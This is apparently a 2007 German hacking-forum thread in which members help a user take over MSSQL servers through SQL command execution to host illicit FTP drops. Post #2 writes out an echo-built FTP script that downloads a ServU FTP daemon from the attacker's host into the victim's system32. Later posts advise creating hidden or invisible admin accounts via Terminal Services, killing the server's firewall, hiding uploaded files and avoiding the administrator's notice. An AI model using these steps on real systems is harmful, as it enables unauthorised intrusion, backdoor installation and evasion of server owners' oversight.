#1 27. Februar 2007 Hiho, ich hab ein prob... und zwar immer wenn ich per SQLexec auf den Server geh und mein Script starten will denn kommt: Was heißt des?? Der Befehl is: Das Script sieht so aus: Was mache ich falsch?? warum kann der des Script net öffnen... das is doch im C:\ habs auch scho mit anderen scripts probiert... einfach ma echo bla quit.... kam das selbe MfG °EraZoR° + Multi-Zitat Zitieren
#2 27. Februar 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! bei dem script musst du nach jeder zeile (in dem fall) das hier einsetzen >>C:\FTP.txt also z.B. open XXX.XXX.XXX.XXX>>FTP.txt EDIT: ich seh grad das da noch so einige sachen fehlen...also dein script muss in deinem falle so aussehen am ende: Code: echo open XXX.XXX.XXX.XXX>>FTP.txt echo anonymous>>FTP.txt echo anonymous@lol.com>>FTP.txt echo BINARY>>FTP.txt echo get ServUDaemon.exe>>FTP.txt echo get ServUDaemon.ini>>FTP.txt echo quit>>FTP.txt Optional musst du auch deine servu ins sys32 dir machen, das machst du mit dem Befehl: echo lcd C:\WINDOWS\system32>>FTP.txt oder echo lcd %winroot%\system32>>FTP.txt (bin mir nicht ganz sicher, aber so in etwa dürfte das sein) dieser Befehl kommt vor den "get" zeilen! EDIT2: ich hab nochmal nachgeschaut, also wenne "set" inna cmd eingibst kommt das hier als Windows Root SystemRoot=C:\WINDOWS also musse schaun, statt %winroot%, könnte es auch %systemroot% heißen, weiß ich grade nicht...musst du probieren! BTW: kleiner tipp...lern ganz schnell mssql als basis und dann fang an zu sploiten, mssql wird nach sehr kurzer zeit frustrierend was die gehackten server angeht...scanstr0s ok, aber Fillstr0s..naja, nur wenn du glück hast! MfG .iNC + Multi-Zitat Zitieren
#3 28. Februar 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! *hust* ich nehme an dass er die .txt datei ja bereits richtig erstellt hat... wie es ausschaut wurde dein server bereits von einem anderen erobert und der FTP Dienst ersetzt sodass er nicht mehr funktionsfähig ist. Du könntest es jedoch mit RCP versuchen. + Multi-Zitat Zitieren
#4 28. Februar 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! Naja, das kann natürlich auch sein, aber das hätte er auch sagen müssen, aber seine aussagen wirkten recht noobig (im sinne von das du frisch dazu kommst). Und das script ist nunmal falsch wenn er echt das eingegeben hat. Also wie mein vorgänger sagte, entweder RCP oder mach nen Portscan und schau nach anderen exploits! MfG .iNC + Multi-Zitat Zitieren
#5 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! Wenn FTP nicht funtz: Terminal Service Account erstellen -> Einloggen -> Die Daten per IE o.ä. auf den Server bringen & "verstecken" -> Deine ServU als Service starten... Aber wenn du logisch denken könntest, würde dir das einfallen. Wenn Server Firewall hat: Firewall in TerminalService killen->ServU neustarten Wenn Server Router hat: *****karte *g* (Es gibts noch paar möglichkeiten die ich hier nicht erwähnen will ) BW wäre nice! + Multi-Zitat Zitieren
#6 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! dann bist du ja bestimmt einer von den coolen, die den ts per cmd enablen können.. denn is ts aus, dann bringt dir deine achso tolle methode gar nix.. dem posting von daedalus kann man echt nix mehr hinzufügen.. entweder er macht es so oder er machts nicht so.. seine entscheidung.. lol, also man sollte es können.. dan klappts auch mit den servern.. das hat nix mit glück zu tun.. schreibs dir hinter die ohren.. + Multi-Zitat Zitieren
#7 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! Achja Stros "hackt" man nicht, sondern wenn du sie "gehackt" hast und deinen ftp zb drauf installiert hast ist es ein Str0. Zur übertragung empfehle ich dir RCP oder HTTP, TS accounts wie Hacker:Hacker zu machen ist glaube ich nich sehr schlau. Es gibt nich nur dumme Admins. Würde es dir nich auffallen wenn plötzlich ein neuer Administrator auf deinem Server ist?? ^^ Es sei den du machst einen unsichtbaren User. Trotzdem denke ich ist TS die unsicherste Methode und nich jeder hat den terminal service am laufen. Den zu aktivieren ist eigentlich auch sehr auffällig. In deinem Beispiel wurde anscheinend der FTP Service von einem anderen "Hacker" deaktiviert. + Multi-Zitat Zitieren
#8 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! wat @ helloweenracer^^? du hast aufgehört ;o? .. wat man hier so beim durchstöbern noch alles erfährt XD *per icq anschreib* so.. nun zum thema.. ob n anderer sploit oder nicht ist im sinne scheiss egal.. ihr könnt euch die dienste anschauen.. ihr könnt euch tasklist anschauen.. ihr könnt n portscan machen.. ihr könnt den dienst komplett neu erstellen und/oder starten.. was wolltn ihr mehr ?! + Multi-Zitat Zitieren
#9 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! @Halloweenracer Ich hab ihn nur eine der vielen Möglichkeiten beschrieben. B2T: 1.Möglichkeit Du könntest versuchen den Rechner per "shutdown" neuzustarten. Vielleicht funktioniert es dann. 2.Möglichkeit Du lässt es sein! + Multi-Zitat Zitieren
#10 3. März 2007 AW: Str0 hacken?! SQL exec prob!! wichtig!!! zu 1.) die ganzen bats und hast nicht gesehen, die man findet um ts zu starten, die sind alle müll, da es auch ohne nen reboot geht.. mal davon abgesehen.. fällt ja gar nicht auf, wenn du den server rebootest.. zu 2. ) ja, das kannst du tun und btw.. du hast die möglichkeit beschrieben, die schon aufgeführt wurde.. schau mal weiter oben in die liste der möglichkeiten, da stehen 2 buchstaben (TS) .. mfg + Multi-Zitat Zitieren